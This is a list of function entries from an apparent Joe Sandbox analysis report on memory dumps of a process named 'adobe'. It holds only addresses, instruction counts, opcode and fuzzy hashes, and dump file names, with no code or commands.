String ID:
API String ID:
Opcode ID: 9599d7f3216f5f4dc0fa4958d6053cac5e6fb5e6f16faa611101b36cdfc6362e
Instruction ID: 226ec650a67c61c94a0fc52c9aa6f0e5a74d2e578566a4c5d5c70273a090c4a2
Opcode Fuzzy Hash: 9599d7f3216f5f4dc0fa4958d6053cac5e6fb5e6f16faa611101b36cdfc6362e
Instruction Fuzzy Hash: 4FE16330E1061A8FDF68FB65D4906AEB7B2FF89300F20852AE505DF355DB31A846CB91

Function 06A8B198 Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4624397158.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6a80000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd5b78186aae88d28527a26a517408b0c74d9737faff6beb860819bbb21c90eb
Instruction ID: 97834a1d15be4fc4411f85ef5a843b3b9ae086f9d68e2d84b504ea81ecd52690
Opcode Fuzzy Hash: fd5b78186aae88d28527a26a517408b0c74d9737faff6beb860819bbb21c90eb
Instruction Fuzzy Hash: F0A15330E101098FEF64FBA9D4907AEB7B6EB99310F244525E505EB395DA38DC81CBA1

Function 06A890C8 Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4624397158.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6a80000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ac152ab73084717db79a888835299d7212dec58bb481d3067f1f2ec656d2d9d
Instruction ID: 314a485e489aff5c5937a8343ea26c665ac8dc5d82888570dda77637a49fefb7
Opcode Fuzzy Hash: 9ac152ab73084717db79a888835299d7212dec58bb481d3067f1f2ec656d2d9d
Instruction Fuzzy Hash: 72912534B1065A8FDB94EB69D8907AF77F6BF89200F108569D40AEB348EB309D45CB91

Function 06A86158 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4624397158.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6a80000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13679084d70bc659000a5e4e797c3f7cd4aadd148701335138843e146a61920d
Instruction ID: d4fdfb8ed4264a3190f8320ff9830dba9a20e670dbd8205c850102aedecdd6e4
Opcode Fuzzy Hash: 13679084d70bc659000a5e4e797c3f7cd4aadd148701335138843e146a61920d
Instruction Fuzzy Hash: CB61E371F001224FDF14AB7ED88465FBAE7AFC4210B144479E80ADB365DE65EC0287D1

Function 06A84251 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4624397158.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6a80000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4baf2e4cbedaeee85e7d3df0436a72c0cff22efeaaa17ef4887ef8215512be52
Instruction ID: 156afa90ef680eaf98c5ef0ecd93ba2fd43da09869d4bf9e129b4197f504b697
Opcode Fuzzy Hash: 4baf2e4cbedaeee85e7d3df0436a72c0cff22efeaaa17ef4887ef8215512be52
Instruction Fuzzy Hash: 6C815D34B0125A8FDB54EBA9D4947AEB7F2EF89300F148529D40ADB384EB74DC42CB81

Function 06A84260 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4624397158.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6a80000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52ed29f944c005e407e3db5092d8c2391fd3f4aaa28680064739450c6227e709
Instruction ID: 3693abc246569dd76617107960b10e62d2ef10168d050c181351c63e54c17851
Opcode Fuzzy Hash: 52ed29f944c005e407e3db5092d8c2391fd3f4aaa28680064739450c6227e709
Instruction Fuzzy Hash: C0814D34B1125A8FDB54EBA9D4547AEB7F2EF89300F108529D40ADB384EB74EC42CB91

Function 06A8456C Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4624397158.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6a80000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02e332692e6b6be68f2a78d1e2ad142e21ba5367455f5cf14bcdbbff542c871d
Instruction ID: 15270e0bb930cbbc771a623dbc16489a854e0695277eebaf04f32e163ee45f24
Opcode Fuzzy Hash: 02e332692e6b6be68f2a78d1e2ad142e21ba5367455f5cf14bcdbbff542c871d
Instruction Fuzzy Hash: 83912034E1061A8FDF64DF68C890B9DB7B1FF89310F2086A9D549AB345DB70A985CF90

Function 06A84580 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4624397158.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6a80000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c313bd63cf9fbd9bfadf9a6d8b4e2090b32af96488b7705d26fda1355e39897d
Instruction ID: 986c1ebc4e2ee33b29b65ef5fcdd9d035f7000ebe9e8257b23047979a04c9460
Opcode Fuzzy Hash: c313bd63cf9fbd9bfadf9a6d8b4e2090b32af96488b7705d26fda1355e39897d
Instruction Fuzzy Hash: D5911F34E1061A8FDF64DF68C890B9DB7B1FF89310F2085A9D549AB345DB70A985CF90

Function 06A8EE98 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4624397158.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6a80000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12c8ee7bf08cda36a9fb3da2c18e6a6066a9a04552240c4d71bd8d9858c29be4
Instruction ID: dbcade4047989a70414b4cc713ceb306be379c71a3e69f360e7a097af7aa03dd
Opcode Fuzzy Hash: 12c8ee7bf08cda36a9fb3da2c18e6a6066a9a04552240c4d71bd8d9858c29be4
Instruction Fuzzy Hash: 94711C70E001199FDB55EBA9D990AADBBF6FF88300F148529E105EB355EB30EC46CB50

Function 06A8EEA8 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4624397158.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6a80000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eba3b11839713a8c9db9b94cb7f6df485e44810ab164110c3af0e9008d7c6631
Instruction ID: 37d9787eaa45f0cb9693f0d4a38ea9fd2922f4cc5628dcd6c144a56605e479fd
Opcode Fuzzy Hash: eba3b11839713a8c9db9b94cb7f6df485e44810ab164110c3af0e9008d7c6631
Instruction Fuzzy Hash: 79710B70E002099FDB54EBA9D990AADBBF6FF88340F148529E505EB355EB30EC46CB50

Function 06A84B18 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4624397158.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6a80000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84ca35f66efb6e7cb7479727536ffc14f229f1b90eb4b25c40d0dfd230c40960
Instruction ID: bc72af81340842a867bc923f57eace44c9652d09174f6ae0fc63b6bbedc98371
Opcode Fuzzy Hash: 84ca35f66efb6e7cb7479727536ffc14f229f1b90eb4b25c40d0dfd230c40960
Instruction Fuzzy Hash: BF618C70F002199FEF54ABA5C8547AEBAF6FB88300F20852AE506AB395DF755C45CF90

Function 06A8FB38 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4624397158.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6a80000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57ad50045a5c7ae6e3a5e9aaa71721d1fbcf5cd8310d697afb4598348d40631e
Instruction ID: 535e866fc8807132e10c10eb9e0d839801c5c78ca08367a267d92ba4f725af6e
Opcode Fuzzy Hash: 57ad50045a5c7ae6e3a5e9aaa71721d1fbcf5cd8310d697afb4598348d40631e
Instruction Fuzzy Hash: 5C51D131E0010ADFDF54BBB8E4946ADB7B2FF89355F208879E106DB255DB359846CB80

Function 06A8F8D9 Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4624397158.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6a80000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9191d2e3dabbdfc0ad52a5e0697c71b2e73af5e9f9fe8b4d196f5c44206b7836
Instruction ID: d04d5b985a7de30260d5102d5a0edeb52c39dea15d20dd26d3016dc79d35d023
Opcode Fuzzy Hash: 9191d2e3dabbdfc0ad52a5e0697c71b2e73af5e9f9fe8b4d196f5c44206b7836
Instruction Fuzzy Hash: A751D734F101159FEF60B76CD85476F7666D7C9390F20452AE50ADB396CA29CC82CB92

Function 06A8F8E8 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4624397158.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6a80000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a680be50d425a759ef23b1eae918abdfc712d8357e15e472531e51265b9671aa
Instruction ID: d1b2f70bebc0b02fc9114f4eb3f5e41306fd7379ec53dd282df1af85a15b1b0c
Opcode Fuzzy Hash: a680be50d425a759ef23b1eae918abdfc712d8357e15e472531e51265b9671aa
Instruction Fuzzy Hash: 7051A634B101159FEF64B76CD85472F756AD7CE390F20452AF50ADB396CA28CC8287A2

Function 06A890BB Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4624397158.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6a80000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a7752623f7f011fe1173f5d184d10499a4eaab2d04da36b12ac76dd6dfb2844
Instruction ID: a6fd564f1ef6842cf72ff55db0999e2ce50c57b3e67eead5558caa26f4b08b9a
Opcode Fuzzy Hash: 3a7752623f7f011fe1173f5d184d10499a4eaab2d04da36b12ac76dd6dfb2844
Instruction Fuzzy Hash: FC510034B1155A8FDB94EB79D890B6E77F6BB89200F148569C40AEB348EB30AC01CB91

Function 06A853D0 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4624397158.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6a80000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13646635de31e7deaf38b49576f9e52b17901c13181d880cc3e216edbc8c98bb
Instruction ID: fa7aaaacad9dea60981aad8cc2c1f1a83c817095dd4b9587a80826e706dfe2cd
Opcode Fuzzy Hash: 13646635de31e7deaf38b49576f9e52b17901c13181d880cc3e216edbc8c98bb
Instruction Fuzzy Hash: 97413A35E006098FDFB0EFA9D880AAFF7B2EB84214F10492AD556DB640D231A855CB90

Function 06A84B09 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4624397158.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6a80000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7ae6a109587dfee06de428fe4750557a9feb6873643ed7a36a88778cf9c6c1d
Instruction ID: a1752d69b01a71d9c885859fbce832d215b91912bc80b087539ce966005736c0
Opcode Fuzzy Hash: a7ae6a109587dfee06de428fe4750557a9feb6873643ed7a36a88778cf9c6c1d
Instruction Fuzzy Hash: B9418E74F002199FDB54ABE5C854B9EBBF6FF88300F208529E505AB395DB709C45CB90

Function 06A8DA50 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4624397158.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6a80000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8afe9263467a413ff31c8cc093b3b5d05fad2af5251d565630f6d99d9513105f
Instruction ID: 700ec1a22d5ed1b57d9beadbaa7b554bd1d3479a50cd8e1110989b3b328c82d8
Opcode Fuzzy Hash: 8afe9263467a413ff31c8cc093b3b5d05fad2af5251d565630f6d99d9513105f
Instruction Fuzzy Hash: B7417F70E1021ADFDB64FFA5C49469EBBB2FF85340F204529E405EB285EB75E846CB80

Function 06A8DA3D Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4624397158.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6a80000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f8f0b72f56298c81df16eff3bd05549de17abec8476dd2717fbaa07ae368fb0
Instruction ID: 637b4f47099d50c87986dcb4283d530000164bd958a752685161f382ce77099f
Opcode Fuzzy Hash: 2f8f0b72f56298c81df16eff3bd05549de17abec8476dd2717fbaa07ae368fb0
Instruction Fuzzy Hash: 67419F70E10215DFDB64FF75C48469EBBB2BF85340F204529E401EB285EB71A842CB80

Function 06A821B5 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4624397158.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6a80000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 970134afe4c95ef9b9829043d406e5ce6f51bbc76a2f40ccebe915adda014ffa
Instruction ID: 615c3d02e15891f17a7ea48f46dcd8e24c3d37d8d3c0ffe2f78bd4a4f6fc6839
Opcode Fuzzy Hash: 970134afe4c95ef9b9829043d406e5ce6f51bbc76a2f40ccebe915adda014ffa
Instruction Fuzzy Hash: B231BF30B002418FEB59BB74D5647BE7BA2AB8A200F144669D442DF395EE39CD06CBD1

Function 06A821C8 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4624397158.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6a80000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 519e8aa3366b722c035a7171995aff16f8030827869fbc438a85039a8c7ea193
Instruction ID: 4b2eb45a6166f613c528100edfadf696e5f8890b39c769d74be1d2e491da6295
Opcode Fuzzy Hash: 519e8aa3366b722c035a7171995aff16f8030827869fbc438a85039a8c7ea193
Instruction Fuzzy Hash: 5F31CF30B102068FEB58BB75D4647BE7BA6BB89200F204579D402DB398EE39DD05CBD1

Function 06A8FB27 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4624397158.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6a80000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bd8c032ab1fdfbc4490926d41f7426e49744611e7ba78a6942799aaac3f647c
Instruction ID: f8a25264679837d9bb5af229457ad9827f4d360500fbf4c0e4636f43187ec0ae
Opcode Fuzzy Hash: 7bd8c032ab1fdfbc4490926d41f7426e49744611e7ba78a6942799aaac3f647c
Instruction Fuzzy Hash: 33212735B101158FDF68B7BCD86429E73A7EBC9290F20893AD50ADB355DA35CC42CB91

Function 06A82078 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4624397158.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6a80000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0640a187a13015349603d3d6271bccd2f9028a0f8ca3d43853b2c579f8ff1b
Instruction ID: 617b34102c5d0e8b29840dc93049e28f27c0770ff5f89711f97e23f7447c2b42
Opcode Fuzzy Hash: 0f0640a187a13015349603d3d6271bccd2f9028a0f8ca3d43853b2c579f8ff1b
Instruction Fuzzy Hash: 21316274E106158FDF19DFA4D8946AEB7B2FF89300F208919E506EB340DB71AD42CB90

Function 06A82088 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4624397158.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6a80000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: beb06be544010947c3114119833e5ef6eee6fca48fac150ea7961d00f9672f4e
Instruction ID: 13143b9c53cb2d481892629df14c6cf30407463f1cb3cb484ace4a5fd9726e49
Opcode Fuzzy Hash: beb06be544010947c3114119833e5ef6eee6fca48fac150ea7961d00f9672f4e
Instruction Fuzzy Hash: 50313E74E102159FDF19EFA5D8946AEB7B2BFC9300F208919E506AB350DB71A942CB90

Function 06A83E58 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4624397158.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6a80000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d6384f4b5deaf5915ba002f66b9d96c1ccc719ba29cc608c582672cf690a0d4
Instruction ID: 62a4d18ae350527cd10df76fab527ed4e213031b1993776d9fd586be411d7539
Opcode Fuzzy Hash: 1d6384f4b5deaf5915ba002f66b9d96c1ccc719ba29cc608c582672cf690a0d4
Instruction Fuzzy Hash: 14217F75E016159FDF40EFA9E840AAEBBF5AB48610F04812AE905EB340E770EC01CB90

Function 06A83E68 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4624397158.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6a80000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fbed099e6bdfb3f92e0c2b39858bb25f72355d085da85916c6cc8a0cd54a1d1
Instruction ID: fd67667f17a921123ddc5d6f17c970380fa27d146b7c43b1ab1fc727a3a3bb4c
Opcode Fuzzy Hash: 7fbed099e6bdfb3f92e0c2b39858bb25f72355d085da85916c6cc8a0cd54a1d1
Instruction Fuzzy Hash: 72213B75E116159FDF50EFA9E940AAEBBF5BB48610F14812AE905EB340E770EC40CB90

Function 0105D006 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4606767545.000000000105D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0105D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_105d000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e39d62e8922b51c0ad7a134135ff06379677d1f910b511c6f6beafe33591e94
Instruction ID: b8bc4c01ec22301fdeff93c4070e030e8512f7d72560b1ca8d9e83584906bda3
Opcode Fuzzy Hash: 7e39d62e8922b51c0ad7a134135ff06379677d1f910b511c6f6beafe33591e94
Instruction Fuzzy Hash: 2E21807550D3C49FCB53CF64C990711BFB1AB46214F29C5DBD9898F2A7C23A980ACB62

Function 0104D4D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4606610175.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_104d000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c950b2d2fa802ea5f0eee4f4e01c3ccd5a3846ae21f54587df00486c42fb74b0
Instruction ID: 5b91e0798ef63e3b483302a69d64cc24b283a78025504aeedd4ec1d2945694fb
Opcode Fuzzy Hash: c950b2d2fa802ea5f0eee4f4e01c3ccd5a3846ae21f54587df00486c42fb74b0
Instruction Fuzzy Hash: DA2128B1500204DFDB05DF54D9C0B16BFA5FB98318F2081BDE9494B256C736D456CBE2

Function 0104D3EC Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4606610175.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_104d000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04f8dcbbe33f83b7ca445921c9095a0160e19a403616a67cf78e5ebc215782f9
Instruction ID: 28ffded309d1939f321c2769748f43c463757b3a2162696ffaf55ed28420730e
Opcode Fuzzy Hash: 04f8dcbbe33f83b7ca445921c9095a0160e19a403616a67cf78e5ebc215782f9
Instruction Fuzzy Hash: DA21F1B2500204EFDB05DF94D9C0B6ABFA5FBE4324F20C5B9E9490B246C736E456CBA1

Function 0105D030 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4606767545.000000000105D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0105D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_105d000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d65a16b2bd2a855c18eec96719e6124e6a02ce625181daef28462161546b71d3
Instruction ID: f18b3fb709068ea435a08d2d2fd3fdebe08791ca12fff78bcace156430b2f606
Opcode Fuzzy Hash: d65a16b2bd2a855c18eec96719e6124e6a02ce625181daef28462161546b71d3
Instruction Fuzzy Hash: 3E210371504204EFDB91DF94D980B26BBA5EB84314F20C5AEED894B242C33AD447CB62

Function 06A83F78 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4624397158.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6a80000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87db5e8000488395bce78665f72f463b820a4e4e63ab185080a1b91f5b86e980
Instruction ID: 3b65cedaace425a28bd2243395dfac24c04fc937a723cf4d1ec794e4993d48b0
Opcode Fuzzy Hash: 87db5e8000488395bce78665f72f463b820a4e4e63ab185080a1b91f5b86e980
Instruction Fuzzy Hash: CE118E36B101258FDF54B6A8D814AAE77FAEFC8611B108539D40BEB344EE659C029BD1

Function 06A841B1 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4624397158.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6a80000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42f86338aebaebb69f16eb743027c9e22dcc185e1c6d007be9fae85b0bde8be9
Instruction ID: 7128cba294a3a3a91317baba309c20c8d63660b40b45573d9471547baa29ac15
Opcode Fuzzy Hash: 42f86338aebaebb69f16eb743027c9e22dcc185e1c6d007be9fae85b0bde8be9
Instruction Fuzzy Hash: 94018435B101115FDB64E6AED851B6BB6DAE7C9710F14C83AE50ACB340ED66DC438391

Function 0104D4D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4606610175.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_104d000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
Instruction ID: f1af9cf415a94610eea3a648dfb5b82e0bbf6f3f30dff047158ffa3660e9d450
Opcode Fuzzy Hash: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
Instruction Fuzzy Hash: A911E1B2504240DFCB02CF44D5C0B16BFB1FB94314F2482A9D8490B257C33AD45ACBA2

Function 0104D3E7 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4606610175.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_104d000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
Instruction ID: 90bc7e651b6b214116a723fe9d0a5e8bae70424700173e6d35acfc5dc0c10326
Opcode Fuzzy Hash: 77fadd82fdc2d56cf39070efea1a70d2bd0433e89b8e3a9964b57efaebe0ac53
Instruction Fuzzy Hash: 6E11DFB2504240DFCB02CF54D5C0B56BFA2FB94320F24C5A9D8490B657C33AE45ACBA2

Function 06A83C38 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4624397158.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6a80000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f812ad598ad8ca0689acadeb1d03ae307e7420db61dfcf5256ae0e71252c76b
Instruction ID: d370166fb4116e7f8f64cdfe8da8c016e91be0a6f45ebcf43430eb1247e1f432
Opcode Fuzzy Hash: 0f812ad598ad8ca0689acadeb1d03ae307e7420db61dfcf5256ae0e71252c76b
Instruction Fuzzy Hash: 0711CFB5D01229EFCB00DF9AD984ACEFBB4FB48710F10812AE918A7340C374A954CBA5

Function 06A83C30 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4624397158.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6a80000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1987e4ae24a40101ef9aa44e223df7d5c1f772b4623d983577fd2a7ceb448de2
Instruction ID: 8c8c0612f34479c229dbc6e8673cd243f207374f55674219b74bac299039fd2a
Opcode Fuzzy Hash: 1987e4ae24a40101ef9aa44e223df7d5c1f772b4623d983577fd2a7ceb448de2
Instruction Fuzzy Hash: BE21EEB5D01229EFCB00DF9AD985ACEFBB4BB48710F10812AE918B7241D374A944CFA5

Function 06A8F118 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4624397158.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6a80000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed7956dcc160f1632f25622c1394df85e0ceb9d08be88ced61d48389b68a3852
Instruction ID: 5875a4a12f36dacb00e0ae8ed7be03f39c77ad3bdc777d95a052469346e1ade3
Opcode Fuzzy Hash: ed7956dcc160f1632f25622c1394df85e0ceb9d08be88ced61d48389b68a3852
Instruction Fuzzy Hash: EE01DFB5B100128FDB65EBACE86172E63D6EBC9750F14883AE20ACB341DA21DC138395

Function 06A841C0 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4624397158.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6a80000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 630aa5712c856e18552a50fe98c54d2eba925e7ae3b181be19adf6aed3a3d740
Instruction ID: d6ae73d293f22b64e03232db0430e4e16f435db2366fefb934e9a46e710c427a
Opcode Fuzzy Hash: 630aa5712c856e18552a50fe98c54d2eba925e7ae3b181be19adf6aed3a3d740
Instruction Fuzzy Hash: B2018635B100114FDB65B6AD945072FB2DAEBCD710F14C93AE50ACB340ED66DC438395

